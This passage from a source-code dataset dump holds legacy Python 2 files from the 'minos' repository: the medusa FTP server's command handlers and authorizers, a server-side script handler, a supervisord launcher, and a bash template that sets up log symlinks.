--------------------------------------------------\n\n def check_command_authorization (self, command):\n if command in self.write_commands and self.read_only:\n return 0\n else:\n return 1\n\n # --------------------------------------------------\n # utility methods\n # --------------------------------------------------\n\n def log (self, message):\n self.server.logger.log (\n self.addr[0],\n '%d %s' % (\n self.addr[1], message\n )\n )\n\n def respond (self, resp):\n self.log ('==> %s' % resp)\n self.push (resp + '\\r\\n')\n\n def command_not_understood (self, command):\n self.respond (\"500 '%s': command not understood.\" % command)\n\n def command_not_authorized (self, command):\n self.respond (\n \"530 You are not authorized to perform the '%s' command\" % (\n command\n )\n )\n\n def make_xmit_channel (self):\n # In PASV mode, the connection may or may _not_ have been made\n # yet. [although in most cases it is... FTP Explorer being\n # the only exception I've yet seen]. This gets somewhat confusing\n # because things may happen in any order...\n pa = self.passive_acceptor\n if pa:\n if pa.ready:\n # a connection has already been made.\n conn, addr = self.passive_acceptor.ready\n cdc = xmit_channel (self, addr)\n cdc.set_socket (conn)\n cdc.connected = 1\n self.passive_acceptor.close()\n self.passive_acceptor = None\n else:\n # we're still waiting for a connect to the PASV port.\n cdc = xmit_channel (self)\n else:\n # not in PASV mode.\n ip, port = self.client_addr\n cdc = xmit_channel (self, self.client_addr)\n cdc.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n if self.bind_local_minus_one:\n cdc.bind (('', self.server.port - 1))\n try:\n cdc.connect ((ip, port))\n except socket.error, why:\n self.respond (\"425 Can't build data connection\")\n self.client_dc = cdc\n\n # pretty much the same as xmit, but only right on the verge of\n # being worth a merge.\n def make_recv_channel (self, fd):\n pa = self.passive_acceptor\n if pa:\n if pa.ready:\n # a connection has already been made.\n conn, addr = pa.ready\n cdc = recv_channel (self, addr, fd)\n cdc.set_socket (conn)\n cdc.connected = 1\n self.passive_acceptor.close()\n self.passive_acceptor = None\n else:\n # we're still waiting for a connect to the PASV port.\n cdc = recv_channel (self, None, fd)\n else:\n # not in PASV mode.\n ip, port = self.client_addr\n cdc = recv_channel (self, self.client_addr, fd)\n cdc.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n try:\n cdc.connect ((ip, port))\n except socket.error, why:\n self.respond (\"425 Can't build data connection\")\n self.client_dc = cdc\n\n type_map = {\n 'a':'ASCII',\n 'i':'Binary',\n 'e':'EBCDIC',\n 'l':'Binary'\n }\n\n type_mode_map = {\n 'a':'t',\n 'i':'b',\n 'e':'b',\n 'l':'b'\n }\n\n # --------------------------------------------------\n # command methods\n # --------------------------------------------------\n\n def cmd_type (self, line):\n 'specify data transfer type'\n # ascii, ebcdic, image, local <byte size>\n t = string.lower (line[1])\n # no support for EBCDIC\n # if t not in ['a','e','i','l']:\n if t not in ['a','i','l']:\n self.command_not_understood (string.join (line))\n elif t == 'l' and (len(line) > 2 and line[2] != '8'):\n self.respond ('504 Byte size must be 8')\n else:\n self.current_mode = t\n self.respond ('200 Type set to %s.' % self.type_map[t])\n\n\n def cmd_quit (self, line):\n 'terminate session'\n self.respond ('221 Goodbye.')\n self.close_when_done()\n\n def cmd_port (self, line):\n 'specify data connection port'\n info = string.split (line[1], ',')\n ip = string.join (info[:4], '.')\n port = string.atoi(info[4])*256 + string.atoi(info[5])\n # how many data connections at a time?\n # I'm assuming one for now...\n # TODO: we should (optionally) verify that the\n # ip number belongs to the client. [wu-ftpd does this?]\n self.client_addr = (ip, port)\n self.respond ('200 PORT command successful.')\n\n def new_passive_acceptor (self):\n # ensure that only one of these exists at a time.\n if self.passive_acceptor is not None:\n self.passive_acceptor.close()\n self.passive_acceptor = None\n self.passive_acceptor = passive_acceptor (self)\n return self.passive_acceptor\n\n def cmd_pasv (self, line):\n 'prepare for server-to-server transfer'\n pc = self.new_passive_acceptor()\n port = pc.addr[1]\n ip_addr = pc.control_channel.getsockname()[0]\n self.respond (\n '227 Entering Passive Mode (%s,%d,%d)' % (\n string.replace(ip_addr, '.', ','),\n port/256,\n port%256\n )\n )\n self.client_dc = None\n\n def cmd_nlst (self, line):\n 'give name list of files in directory'\n # ncftp adds the -FC argument for the user-visible 'nlist'\n # command. We could try to emulate ls flags, but not just yet.\n if '-FC' in line:\n line.remove ('-FC')\n try:\n dir_list_producer = self.get_dir_list (line, 0)\n except os.error, why:\n self.respond ('550 Could not list directory: %s' % why)\n return\n self.respond (\n '150 Opening %s mode data connection for file list' % (\n self.type_map[self.current_mode]\n )\n )\n self.make_xmit_channel()\n self.client_dc.push_with_producer (dir_list_producer)\n self.client_dc.close_when_done()\n\n def cmd_list (self, line):\n 'give a list of files in a directory'\n try:\n dir_list_producer = self.get_dir_list (line, 1)\n except os.error, why:\n self.respond ('550 Could not list directory: %s' % why)\n return\n self.respond (\n '150 Opening %s mode data connection for file list' % (\n self.type_map[self.current_mode]\n )\n )\n self.make_xmit_channel()\n self.client_dc.push_with_producer (dir_list_producer)\n self.client_dc.close_when_done()\n\n def cmd_cwd (self, line):\n 'change working directory'\n if self.cwd (line):\n self.respond ('250 CWD command successful.')\n else:\n self.respond ('550 No such directory.')\n\n def cmd_cdup (self, line):\n 'change to parent of current working directory'\n if self.cdup(line):\n self.respond ('250 CDUP command successful.')\n else:\n self.respond ('550 No such directory.')\n\n def cmd_pwd (self, line):\n 'print the current working directory'\n self.respond (\n '257 \"%s\" is the current directory.' % (\n self.filesystem.current_directory()\n )\n )\n\n # modification time\n # example output:\n # 213 19960301204320\n def cmd_mdtm (self, line):\n 'show last modification time of file'\n filename = line[1]\n if not self.filesystem.isfile (filename):\n self.respond ('550 \"%s\" is not a file' % filename)\n else:\n mtime = time.gmtime(self.filesystem.stat(filename)[stat.ST_MTIME])\n self.respond (\n '213 %4d%02d%02d%02d%02d%02d' % (\n mtime[0],\n mtime[1],\n mtime[2],\n mtime[3],\n mtime[4],\n mtime[5]\n )\n )\n\n def cmd_noop (self, line):\n 'do nothing'\n self.respond ('200 NOOP command successful.')\n\n def cmd_size (self, line):\n 'return size of file'\n filename = line[1]\n if not self.filesystem.isfile (filename):\n self.respond ('550 \"%s\" is not a file' % filename)\n else:\n self.respond (\n '213 %d' % (self.filesystem.stat(filename)[stat.ST_SIZE])\n )\n\n def cmd_retr (self, line):\n 'retrieve a file'\n if len(line) < 2:\n self.command_not_understood (string.join (line))\n else:\n file = line[1]\n if not self.filesystem.isfile (file):\n self.log_info ('checking %s' % file)\n self.respond ('550 No such file')\n else:\n try:\n # FIXME: for some reason, 'rt' isn't working on win95\n mode = 'r'+self.type_mode_map[self.current_mode]\n fd = self.open (file, mode)\n except IOError, why:\n self.respond ('553 could not open file for reading: %s' % (repr(why)))\n return\n self.respond (\n \"150 Opening %s mode data connection for file '%s'\" % (\n self.type_map[self.current_mode],\n file\n )\n )\n self.make_xmit_channel()\n\n if self.restart_position:\n # try to position the file as requested, but\n # give up silently on failure (the 'file object'\n # may not support seek())\n try:\n fd.seek (self.restart_position)\n except:\n pass\n self.restart_position = 0\n\n self.client_dc.push_with_producer (\n file_producer (fd)\n )\n self.client_dc.close_when_done()\n\n def cmd_stor (self, line, mode='wb'):\n 'store a file'\n if len (line) < 2:\n self.command_not_understood (string.join (line))\n else:\n if self.restart_position:\n restart_position = 0\n self.respond ('553 restart on STOR not yet supported')\n return\n file = line[1]\n # todo: handle that type flag\n try:\n fd = self.open (file, mode)\n except IOError, why:\n self.respond ('553 could not open file for writing: %s' % (repr(why)))\n return\n self.respond (\n '150 Opening %s connection for %s' % (\n self.type_map[self.current_mode],\n file\n )\n )\n self.make_recv_channel (fd)\n\n def cmd_abor (self, line):\n 'abort operation'\n if self.client_dc:\n self.client_dc.close()\n self.respond ('226 ABOR command successful.')\n\n def cmd_appe (self, line):\n 'append to a file'\n return self.cmd_stor (line, 'ab')\n\n def cmd_dele (self, line):\n if len (line) != 2:\n self.command_not_understood (string.join (line))\n else:\n file = line[1]\n if self.filesystem.isfile (file):\n try:\n self.filesystem.unlink (file)\n self.respond ('250 DELE command successful.')\n except:\n self.respond ('550 error deleting file.')\n else:\n self.respond ('550 %s: No such file.' % file)\n\n def cmd_mkd (self, line):\n if len (line) != 2:\n self.command_not_understood (string.join (line))\n else:\n path = line[1]\n try:\n self.filesystem.mkdir (path)\n self.respond ('257 MKD command successful.')\n except:\n self.respond ('550 error creating directory.')\n\n def cmd_rnfr (self, line):\n if not hasattr(self.filesystem,'rename'):\n self.respond('502 RNFR not implemented.' % src)\n return\n\n if len(line)!=2:\n self.command_not_understood (string.join (line))\n else:\n src = line[1]\n try:\n assert self.filesystem.isfile(src)\n self._rfnr_src = src\n self.respond('350 RNFR file exists, ready for destination name.')\n except:\n self.respond('550 %s: No such file.' % src)\n\n def cmd_rnto (self, line):\n src = getattr(self,'_rfnr_src',None)\n if not src:\n self.respond('503 RNTO command unexpected.')\n return\n\n if len(line)!=2:\n self.command_not_understood (string.join (line))\n else:\n dst = line[1]\n try:\n self.filesystem.rename(src,dst)\n self.respond('250 RNTO command successful.')\n except:\n t, v = sys.exc_info[:2]\n self.respond('550 %s: %s.' % (str(t),str(v)))\n try:\n del self._rfnr_src\n except:\n pass\n\n def cmd_rmd (self, line):\n if len (line) != 2:\n self.command_not_understood (string.join (line))\n else:\n path = line[1]\n try:\n self.filesystem.rmdir (path)\n self.respond ('250 RMD command successful.')\n except:\n self.respond ('550 error removing directory.')\n\n def cmd_user (self, line):\n 'specify user name'\n if len(line) > 1:\n self.user = line[1]\n self.respond ('331 Password required.')\n else:\n self.command_not_understood (string.join (line))\n\n def cmd_pass (self, line):\n 'specify password'\n if len(line) < 2:\n pw = ''\n else:\n pw = line[1]\n result, message, fs = self.server.authorizer.authorize (self, self.user, pw)\n if result:\n self.respond ('230 %s' % message)\n self.filesystem = fs\n self.authorized = 1\n self.log_info('Successful login: Filesystem=%s' % repr(fs))\n else:\n self.respond ('530 %s' % message)\n\n def cmd_rest (self, line):\n 'restart incomplete transfer'\n try:\n pos = string.atoi (line[1])\n except ValueError:\n self.command_not_understood (string.join (line))\n self.restart_position = pos\n self.respond (\n '350 Restarting at %d. Send STORE or RETRIEVE to initiate transfer.' % pos\n )\n\n def cmd_stru (self, line):\n 'obsolete - set file transfer structure'\n if line[1] in 'fF':\n # f == 'file'\n self.respond ('200 STRU F Ok')\n else:\n self.respond ('504 Unimplemented STRU type')\n\n def cmd_mode (self, line):\n 'obsolete - set file transfer mode'\n if line[1] in 'sS':\n # f == 'file'\n self.respond ('200 MODE S Ok')\n else:\n self.respond ('502 Unimplemented MODE type')\n\n# The stat command has two personalities. Normally it returns status\n# information about the current connection. But if given an argument,\n# it is equivalent to the LIST command, with the data sent over the\n# control connection. Strange. But wuftpd, ftpd, and nt's ftp server\n# all support it.\n#\n## def cmd_stat (self, line):\n## 'return status of server'\n## pass\n\n def cmd_syst (self, line):\n 'show operating system type of server system'\n # Replying to this command is of questionable utility, because\n # this server does not behave in a predictable way w.r.t. the\n # output of the LIST command. We emulate Unix ls output, but\n # on win32 the pathname can contain drive information at the front\n # Currently, the combination of ensuring that os.sep == '/'\n # and removing the leading slash when necessary seems to work.\n # [cd'ing to another drive also works]\n #\n # This is how wuftpd responds, and is probably\n # the most expected. The main purpose of this reply is so that\n # the client knows to expect Unix ls-style LIST output.\n self.respond ('215 UNIX Type: L8')\n # one disadvantage to this is that some client programs\n # assume they can pass args to /bin/ls.\n # a few typical responses:\n # 215 UNIX Type: L8 (wuftpd)\n # 215 Windows_NT version 3.51\n # 215 VMS MultiNet V3.3\n # 500 'SYST': command not understood. (SVR4)\n\n def cmd_help (self, line):\n 'give help information'\n # find all the methods that match 'cmd_xxxx',\n # use their docstrings for the help response.\n attrs = dir(self.__class__)\n help_lines = []\n for attr in attrs:\n if attr[:4] == 'cmd_':\n x = getattr (self, attr)\n if type(x) == type(self.cmd_help):\n if x.__doc__:\n help_lines.append ('\\t%s\\t%s' % (attr[4:], x.__doc__))\n if help_lines:\n self.push ('214-The following commands are recognized\\r\\n')\n self.push_with_producer (producers.lines_producer (help_lines))\n self.push ('214\\r\\n')\n else:\n self.push ('214-\\r\\n\\tHelp Unavailable\\r\\n214\\r\\n')\n\nclass ftp_server (asyncore.dispatcher):\n # override this to spawn a different FTP channel class.\n ftp_channel_class = ftp_channel\n\n SERVER_IDENT = 'FTP Server (V%s)' % VERSION\n\n def __init__ (\n self,\n authorizer,\n hostname =None,\n ip ='',\n port =21,\n resolver =None,\n logger_object=logger.file_logger (sys.stdout)\n ):\n self.ip = ip\n self.port = port\n self.authorizer = authorizer\n\n if hostname is None:\n self.hostname = socket.gethostname()\n else:\n self.hostname = hostname\n\n # statistics\n self.total_sessions = counter()\n self.closed_sessions = counter()\n self.total_files_out = counter()\n self.total_files_in = counter()\n self.total_bytes_out = counter()\n self.total_bytes_in = counter()\n self.total_exceptions = counter()\n #\n asyncore.dispatcher.__init__ (self)\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n\n self.set_reuse_addr()\n self.bind ((self.ip, self.port))\n self.listen (5)\n\n if not logger_object:\n logger_object = sys.stdout\n\n if resolver:\n self.logger = logger.resolving_logger (resolver, logger_object)\n else:\n self.logger = logger.unresolving_logger (logger_object)\n\n self.log_info('FTP server started at %s\\n\\tAuthorizer:%s\\n\\tHostname: %s\\n\\tPort: %d' % (\n time.ctime(time.time()),\n repr (self.authorizer),\n self.hostname,\n self.port)\n )\n\n def writable (self):\n return 0\n\n def handle_read (self):\n pass\n\n def handle_connect (self):\n pass\n\n def handle_accept (self):\n conn, addr = self.accept()\n self.total_sessions.increment()\n self.log_info('Incoming connection from %s:%d' % (addr[0], addr[1]))\n self.ftp_channel_class (self, conn, addr)\n\n # return a producer describing the state of the server\n def status (self):\n\n def nice_bytes (n):\n return string.join (status_handler.english_bytes (n))\n\n return producers.lines_producer (\n ['<h2>%s</h2>' % self.SERVER_IDENT,\n '<br>Listening on <b>Host:</b> %s' % self.hostname,\n '<b>Port:</b> %d' % self.port,\n '<br>Sessions',\n '<b>Total:</b> %s' % self.total_sessions,\n '<b>Current:</b> %d' % (self.total_sessions.as_long() - self.closed_sessions.as_long()),\n '<br>Files',\n '<b>Sent:</b> %s' % self.total_files_out,\n '<b>Received:</b> %s' % self.total_files_in,\n '<br>Bytes',\n '<b>Sent:</b> %s' % nice_bytes (self.total_bytes_out.as_long()),\n '<b>Received:</b> %s' % nice_bytes (self.total_bytes_in.as_long()),\n '<br>Exceptions: %s' % self.total_exceptions,\n ]\n )\n\n# ======================================================================\n# Data Channel Classes\n# ======================================================================\n\n# This socket accepts a data connection, used when the server has been\n# placed in passive mode. Although the RFC implies that we ought to\n# be able to use the same acceptor over and over again, this presents\n# a problem: how do we shut it off, so that we are accepting\n# connections only when we expect them? [we can't]\n#\n# wuftpd, and probably all the other servers, solve this by allowing\n# only one connection to hit this acceptor. They then close it. Any\n# subsequent data-connection command will then try for the default\n# port on the client side [which is of course never there]. So the\n# 'always-send-PORT/PASV' behavior seems required.\n#\n# Another note: wuftpd will also be listening on the channel as soon\n# as the PASV command is sent. It does not wait for a data command\n# first.\n\n# --- we need to queue up a particular behavior:\n# 1) xmit : queue up producer[s]\n# 2) recv : the file object\n#\n# It would be nice if we could make both channels the same. Hmmm..\n#\n\nclass passive_acceptor (asyncore.dispatcher):\n ready = None\n\n def __init__ (self, control_channel):\n # connect_fun (conn, addr)\n asyncore.dispatcher.__init__ (self)\n self.control_channel = control_channel\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n # bind to an address on the interface that the\n # control connection is coming from.\n self.bind ((\n self.control_channel.getsockname()[0],\n 0\n ))\n self.addr = self.getsockname()\n self.listen (1)\n\n# def __del__ (self):\n# print 'passive_acceptor.__del__()'\n\n def log (self, *ignore):\n pass\n\n def handle_accept (self):\n conn, addr = self.accept()\n dc = self.control_channel.client_dc\n if dc is not None:\n dc.set_socket (conn)\n dc.addr = addr\n dc.connected = 1\n self.control_channel.passive_acceptor = None\n else:\n self.ready = conn, addr\n self.close()\n\n\nclass xmit_channel (asynchat.async_chat):\n\n # for an ethernet, you want this to be fairly large, in fact, it\n # _must_ be large for performance comparable to an ftpd. [64k] we\n # ought to investigate automatically-sized buffers...\n\n ac_out_buffer_size = 16384\n bytes_out = 0\n\n def __init__ (self, channel, client_addr=None):\n self.channel = channel\n self.client_addr = client_addr\n asynchat.async_chat.__init__ (self)\n\n# def __del__ (self):\n# print 'xmit_channel.__del__()'\n\n def log (self, *args):\n pass\n\n def readable (self):\n return not self.connected\n\n def writable (self):\n return 1\n\n def send (self, data):\n result = asynchat.async_chat.send (self, data)\n self.bytes_out = self.bytes_out + result\n return result\n\n def handle_error (self):\n # usually this is to catch an unexpected disconnect.\n self.log_info ('unexpected disconnect on data xmit channel', 'error')\n try:\n self.close()\n except:\n pass\n\n # TODO: there's a better way to do this. we need to be able to\n # put 'events' in the producer fifo. to do this cleanly we need\n # to reposition the 'producer' fifo as an 'event' fifo.\n\n def close (self):\n c = self.channel\n s = c.server\n c.client_dc = None\n s.total_files_out.increment()\n s.total_bytes_out.increment (self.bytes_out)\n if not len(self.producer_fifo):\n c.respond ('226 Transfer complete')\n elif not c.closed:\n c.respond ('426 Connection closed; transfer aborted')\n del c\n del s\n del self.channel\n asynchat.async_chat.close (self)\n\nclass recv_channel (asyncore.dispatcher):\n def __init__ (self, channel, client_addr, fd):\n self.channel = channel\n self.client_addr = client_addr\n self.fd = fd\n asyncore.dispatcher.__init__ (self)\n self.bytes_in = counter()\n\n def log (self, *ignore):\n pass\n\n def handle_connect (self):\n pass\n\n def writable (self):\n return 0\n\n def recv (*args):\n result = apply (asyncore.dispatcher.recv, args)\n self = args[0]\n self.bytes_in.increment(len(result))\n return result\n\n buffer_size = 8192\n\n def handle_read (self):\n block = self.recv (self.buffer_size)\n if block:\n try:\n self.fd.write (block)\n except IOError:\n self.log_info ('got exception writing block...', 'error')\n\n def handle_close (self):\n s = self.channel.server\n s.total_files_in.increment()\n s.total_bytes_in.increment(self.bytes_in.as_long())\n self.fd.close()\n self.channel.respond ('226 Transfer complete.')\n self.close()\n\nimport filesys\n\n# not much of a doorman! 8^)\nclass dummy_authorizer:\n def __init__ (self, root='/'):\n self.root = root\n def authorize (self, channel, username, password):\n channel.persona = -1, -1\n channel.read_only = 1\n return 1, 'Ok.', filesys.os_filesystem (self.root)\n\nclass anon_authorizer:\n def __init__ (self, root='/'):\n self.root = root\n\n def authorize (self, channel, username, password):\n if username in ('ftp', 'anonymous'):\n channel.persona = -1, -1\n channel.read_only = 1\n return 1, 'Ok.', filesys.os_filesystem (self.root)\n else:\n return 0, 'Password invalid.', None\n\n# ===========================================================================\n# Unix-specific improvements\n# ===========================================================================\n\nif os.name == 'posix':\n\n class unix_authorizer:\n # return a trio of (success, reply_string, filesystem)\n def authorize (self, channel, username, password):\n import crypt\n import pwd\n try:\n info = pwd.getpwnam (username)\n except KeyError:\n return 0, 'No such user.', None\n mangled = info[1]\n if crypt.crypt (password, mangled[:2]) == mangled:\n channel.read_only = 0\n fs = filesys.schizophrenic_unix_filesystem (\n '/',\n info[5],\n persona = (info[2], info[3])\n )\n return 1, 'Login successful.', fs\n else:\n return 0, 'Password invalid.', None\n\n def __repr__ (self):\n return '<standard unix authorizer>'\n\n # simple anonymous ftp support\n class unix_authorizer_with_anonymous (unix_authorizer):\n def __init__ (self, root=None, real_users=0):\n self.root = root\n self.real_users = real_users\n\n def authorize (self, channel, username, password):\n if string.lower(username) in ['anonymous', 'ftp']:\n import pwd\n try:\n # ok, here we run into lots of confusion.\n # on some os', anon runs under user 'nobody',\n # on others as 'ftp'. ownership is also critical.\n # need to investigate.\n # linux: new linuxen seem to have nobody's UID=-1,\n # which is an illegal value. Use ftp.\n ftp_user_info = pwd.getpwnam ('ftp')\n if string.lower(os.uname()[0]) == 'linux':\n nobody_user_info = pwd.getpwnam ('ftp')\n else:\n nobody_user_info = pwd.getpwnam ('nobody')\n channel.read_only = 1\n if self.root is None:\n self.root = ftp_user_info[5]\n fs = filesys.unix_filesystem (self.root, '/')\n return 1, 'Anonymous Login Successful', fs\n except KeyError:\n return 0, 'Anonymous account not set up', None\n elif self.real_users:\n return unix_authorizer.authorize (\n self,\n channel,\n username,\n password\n )\n else:\n return 0, 'User logins not allowed', None\n\n# usage: ftp_server /PATH/TO/FTP/ROOT PORT\n# for example:\n# $ ftp_server /home/users/ftp 8021\n\nif os.name == 'posix':\n def test (port='8021'):\n fs = ftp_server (\n unix_authorizer(),\n port=string.atoi (port)\n )\n try:\n asyncore.loop()\n except KeyboardInterrupt:\n fs.log_info('FTP server shutting down. (received SIGINT)', 'warning')\n # close everything down on SIGINT.\n # of course this should be a cleaner shutdown.\n asyncore.close_all()\n\n if __name__ == '__main__':\n test (sys.argv[1])\n# not unix\nelse:\n def test ():\n fs = ftp_server (dummy_authorizer())\n if __name__ == '__main__':\n test ()\n\n# this is the command list from the wuftpd man page\n# '*' means we've implemented it.\n# '!' requires write access\n#\ncommand_documentation = {\n 'abor': 'abort previous command', #*\n 'acct': 'specify account (ignored)',\n 'allo': 'allocate storage (vacuously)',\n 'appe': 'append to a file', #*!\n 'cdup': 'change to parent of current working directory', #*\n 'cwd': 'change working directory', #*\n 'dele': 'delete a file', #!\n 'help': 'give help information', #*\n 'list': 'give list files in a directory', #*\n 'mkd': 'make a directory', #!\n 'mdtm': 'show last modification time of file', #*\n 'mode': 'specify data transfer mode',\n 'nlst': 'give name list of files in directory', #*\n 'noop': 'do nothing', #*\n 'pass': 'specify password', #*\n 'pasv': 'prepare for server-to-server transfer', #*\n 'port': 'specify data connection port', #*\n 'pwd': 'print the current working directory', #*\n 'quit': 'terminate session', #*\n 'rest': 'restart incomplete transfer', #*\n 'retr': 'retrieve a file', #*\n 'rmd': 'remove a directory', #!\n 'rnfr': 'specify rename-from file name', #*!\n 'rnto': 'specify rename-to file name', #*!\n 'site': 'non-standard commands (see next section)',\n 'size': 'return size of file', #*\n 'stat': 'return status of server', #*\n 'stor': 'store a file', #*!\n 'stou': 'store a file with a unique name', #!\n 'stru': 'specify data transfer structure',\n 'syst': 'show operating system type of server system', #*\n 'type': 'specify data transfer type', #*\n 'user': 'specify user name', #*\n 'xcup': 'change to parent of current working directory (deprecated)',\n 'xcwd': 'change working directory (deprecated)',\n 'xmkd': 'make a directory (deprecated)', #!\n 'xpwd': 'print the current working directory (deprecated)',\n 'xrmd': 'remove a directory (deprecated)', #!\n}\n\n\n# debugging aid (linux)\ndef get_vm_size ():\n return string.atoi (string.split(open ('/proc/self/stat').readline())[22])\n\ndef print_vm():\n print 'vm: %8dk' % (get_vm_size()/1024)\n"
},
{
"alpha_fraction": 0.8214285969734192,
"alphanum_fraction": 0.8214285969734192,
"avg_line_length": 17.33333396911621,
"blob_id": "211b114fa18b463a596bd8879c7ce76fb594f5c5",
"content_id": "7315ed9ca8bc6d3c8a244ca02d2f7db61883afd1",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 3,
"path": "/supervisor/supervisord.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "\nfrom supervisor import supervisord\n\nsupervisord.main()\n"
},
{
"alpha_fraction": 0.5497406125068665,
"alphanum_fraction": 0.5552334189414978,
"avg_line_length": 29.483720779418945,
"blob_id": "709dcd39990f465024671ba274a0956c1781276c",
"content_id": "3332e0b2d0f01b1631abb49eadfd25b5b6ea30ff",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6554,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 215,
"path": "/supervisor/supervisor/medusa/script_handler.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# This is a simple python server-side script handler.\n\n# A note about performance: This is really only suited for 'fast'\n# scripts: The script should generate its output quickly, since the\n# whole web server will stall otherwise. This doesn't mean you have\n# to write 'fast code' or anything, it simply means that you shouldn't\n# call any long-running code, [like say something that opens up an\n# internet connection, or a database query that will hold up the\n# server]. If you need this sort of feature, you can support it using\n# the asynchronous I/O 'api' that the rest of medusa is built on. [or\n# you could probably use threads]\n\n# Put your script into your web docs directory (like a cgi-bin\n# script), make sure it has the correct extension [see the overridable\n# script_handler.extension member below].\n#\n# There's lots of things that can be done to tweak the restricted\n# execution model. Also, of course you could just use 'execfile'\n# instead (this is now the default, see class variable\n# script_handler.restricted)\n\nimport rexec\nimport re\nimport string\nimport StringIO\nimport sys\n\nimport counter\nimport default_handler\nimport producers\n\nunquote = default_handler.unquote\n\nclass script_handler:\n\n extension = 'mpy'\n restricted = 0\n\n script_regex = re.compile (\n r'.*/([^/]+\\.%s)' % extension,\n re.IGNORECASE\n )\n\n def __init__ (self, filesystem):\n self.filesystem = filesystem\n self.hits = counter.counter()\n self.exceptions = counter.counter()\n\n def match (self, request):\n [path, params, query, fragment] = request.split_uri()\n m = self.script_regex.match (path)\n return (m and (m.end() == len(path)))\n\n def handle_request (self, request):\n\n [path, params, query, fragment] = request.split_uri()\n\n while path and path[0] == '/':\n path = path[1:]\n\n if '%' in path:\n path = unquote (path)\n\n if not self.filesystem.isfile (path):\n request.error (404)\n return\n else:\n\n self.hits.increment()\n\n request.script_filename = self.filesystem.translate (path)\n\n if request.command in ('PUT', 'POST'):\n # look for a Content-Length header.\n cl = request.get_header ('content-length')\n length = int(cl)\n if not cl:\n request.error (411)\n else:\n collector (self, length, request)\n else:\n self.continue_request (\n request,\n StringIO.StringIO() # empty stdin\n )\n\n def continue_request (self, request, stdin):\n temp_files = stdin, StringIO.StringIO(), StringIO.StringIO()\n old_files = sys.stdin, sys.stdout, sys.stderr\n\n if self.restricted:\n r = rexec.RExec()\n\n try:\n sys.request = request\n sys.stdin, sys.stdout, sys.stderr = temp_files\n try:\n if self.restricted:\n r.s_execfile (request.script_filename)\n else:\n execfile (request.script_filename)\n request.reply_code = 200\n except:\n request.reply_code = 500\n self.exceptions.increment()\n finally:\n sys.stdin, sys.stdout, sys.stderr = old_files\n del sys.request\n\n i,o,e = temp_files\n\n if request.reply_code != 200:\n s = e.getvalue()\n else:\n s = o.getvalue()\n\n request['Content-Length'] = len(s)\n request.push (s)\n request.done()\n\n def status (self):\n return producers.simple_producer (\n '<li>Server-Side Script Handler'\n + '<ul>'\n + ' <li><b>Hits:</b> %s' % self.hits\n + ' <li><b>Exceptions:</b> %s' % self.exceptions\n + '</ul>'\n )\n\n\nclass persistent_script_handler:\n\n def __init__ (self):\n self.modules = {}\n self.hits = counter.counter()\n self.exceptions = counter.counter()\n\n def add_module (self, name, module):\n self.modules[name] = module\n\n def del_module (self, name):\n del self.modules[name]\n\n def match (self, request):\n [path, params, query, fragment] = request.split_uri()\n parts = string.split (path, '/')\n if (len(parts)>1) and self.modules.has_key (parts[1]):\n module = self.modules[parts[1]]\n request.module = module\n return 1\n else:\n return 0\n\n def handle_request (self, request):\n if request.command in ('PUT', 'POST'):\n # look for a Content-Length header.\n cl = request.get_header ('content-length')\n length = int(cl)\n if not cl:\n request.error (411)\n else:\n collector (self, length, request)\n else:\n self.continue_request (request, StringIO.StringIO())\n\n def continue_request (self, request, input_data):\n temp_files = input_data, StringIO.StringIO(), StringIO.StringIO()\n old_files = sys.stdin, sys.stdout, sys.stderr\n\n try:\n sys.stdin, sys.stdout, sys.stderr = temp_files\n # provide a default\n request['Content-Type'] = 'text/html'\n try:\n request.module.main (request)\n request.reply_code = 200\n except:\n request.reply_code = 500\n self.exceptions.increment()\n finally:\n sys.stdin, sys.stdout, sys.stderr = old_files\n\n i,o,e = temp_files\n\n if request.reply_code != 200:\n s = e.getvalue()\n else:\n s = o.getvalue()\n\n request['Content-Length'] = len(s)\n request.push (s)\n request.done()\n\nclass collector:\n\n def __init__ (self, handler, length, request):\n self.handler = handler\n self.request = request\n self.request.collector = self\n self.request.channel.set_terminator (length)\n self.buffer = StringIO.StringIO()\n\n def collect_incoming_data (self, data):\n self.buffer.write (data)\n\n def found_terminator (self):\n self.buffer.seek(0)\n self.request.collector = None\n self.request.channel.set_terminator ('\\r\\n\\r\\n')\n self.handler.continue_request (\n self.request,\n self.buffer\n )\n"
},
{
"alpha_fraction": 0.6421404480934143,
"alphanum_fraction": 0.648829460144043,
"avg_line_length": 15.61111068725586,
"blob_id": "e0a7670cbdb6d73bcf5003d47e6fd374d1517ea6",
"content_id": "4881dd1e6913c7e1e499506a2bb23b12dcae59d5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 299,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 18,
"path": "/config/template/storm/pre.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\njob_name=$1\nrun_dir=$2\npackage_dir=$run_dir/package\nlog_dir=$run_dir/log\n\nln -s $package_dir/public\nmkdir logback\nln -s $run_dir/cluster.xml logback\n\nif ! [ -d logs ]; then\n if [ $job_name = \"logviewer\" ]; then\n ln -s $SUPERVISOR_LOG_DIR logs\n else\n ln -s $log_dir logs\n fi\nfi\n"
},
{
"alpha_fraction": 0.682170569896698,
"alphanum_fraction": 0.6992248296737671,
"avg_line_length": 25.875,
"blob_id": "dde8896d38a903fc3e39c6a1eff24a7e3858554d",
"content_id": "5da2e7414671759898afbab728f592dc24d368f3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1935,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 72,
